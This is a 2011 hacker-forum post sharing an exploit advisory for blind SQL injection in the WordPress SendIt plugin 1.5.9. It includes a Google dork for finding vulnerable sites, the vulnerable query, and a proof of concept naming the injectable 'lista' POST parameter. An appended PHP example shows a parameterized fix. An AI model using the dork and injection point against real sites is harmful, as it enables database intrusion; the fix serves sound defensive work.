.:: Blackc0de Forum ::.

WordPress SendIt plugin 1.5.9 Blind SQL Injection Vulnerability

Black.exe
Global Mod
Subject: WordPress SendIt plugin 1.5.9 Blind SQL Injection Vulnerability (posted Tue Nov 29, 2011 1:46 pm)

Here you go, guys, I want to share a really cool exploit :thumbsup

Quote :
Exploit Title: WordPress SendIt plugin <= 1.5.9 Blind SQL Injection Vulnerability

# Google Dork: inurl:"wp-content/plugins/sendit/submit.php"

# Date: 2011-08-25

# Author: evilsocket ( evilsocket [at] gmail [dot] com )

# Software Link: http://wordpress.org/extend/plugins/sendit/

# Version: 1.5.9 (tested with magic quotes OFF)


---------------
Vulnerable code
---------------

[ submit.php line 27 ]

$user_count = $wpdb->get_var("SELECT COUNT(*) FROM $table_email where email ='$_POST[email_add]' and id_lista = '$_POST[lista]';");


As you can see, the $_POST[lista] parameter is neither validated nor escaped, so you can blind SQL inject it using $user_count for the boolean condition checking:


[ submit.php line 29 ]

if($user_count>0) :
$errore_presente = "<div class=\"error\">".__('email address already present', 'sendit')."</div>";
die($errore_presente);

---
[-] PoC
---

[-] POST:

email_add = some.random.regexp.valid.email@domain.ltd
lista = BLIND SQL INJECTION HERE

TO: http://www.site.com/wp-content/plugins/submit.php
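
The fix for the query quoted above, as an added example that is not part of the original post or the plugin's own code: the same lookup with validated input and a parameterized `$wpdb->prepare()` call. The helper name `sendit_subscriber_exists()` is hypothetical; the example assumes it runs inside WordPress, that `id_lista` is a numeric id, and that `$table_email` is set by the plugin rather than by the request.

```php
<?php
// Added example: hardened form of the duplicate-subscriber check in submit.php.
// sendit_subscriber_exists() is a hypothetical helper, not the plugin's code.
// Assumptions: id_lista is a numeric list id; $table_email comes from the
// plugin (never from the request), because table names cannot be bound.

function sendit_subscriber_exists( $wpdb, $table_email, array $post ) {
    // WordPress adds slashes to $_POST; undo that before validating.
    $email = isset( $post['email_add'] ) ? wp_unslash( $post['email_add'] ) : '';
    $lista = isset( $post['lista'] ) ? wp_unslash( $post['lista'] ) : '';

    // Reject array-valued parameters such as lista[]=... before string checks.
    if ( ! is_string( $email ) || ! is_string( $lista ) ) {
        return new WP_Error( 'sendit_bad_input', 'Malformed request.' );
    }
    // Allow-list validation: a valid email address and an all-digit list id.
    if ( ! is_email( $email ) || ! ctype_digit( $lista ) ) {
        return new WP_Error( 'sendit_bad_input', 'Invalid email address or list.' );
    }

    // Placeholders keep request data out of the SQL text: %s is escaped and
    // quoted by $wpdb->prepare(), %d is formatted as an integer.
    $sql = $wpdb->prepare(
        "SELECT COUNT(*) FROM {$table_email} WHERE email = %s AND id_lista = %d",
        $email,
        (int) $lista
    );

    return (int) $wpdb->get_var( $sql ) > 0;
}

// Usage in place of the query at submit.php line 27:
global $wpdb;
$exists = sendit_subscriber_exists( $wpdb, $table_email, $_POST );
if ( is_wp_error( $exists ) ) {
    wp_die( esc_html( $exists->get_error_message() ), '', array( 'response' => 400 ) );
}
if ( $exists ) {
    die( '<div class="error">' . esc_html__( 'email address already present', 'sendit' ) . '</div>' );
}
```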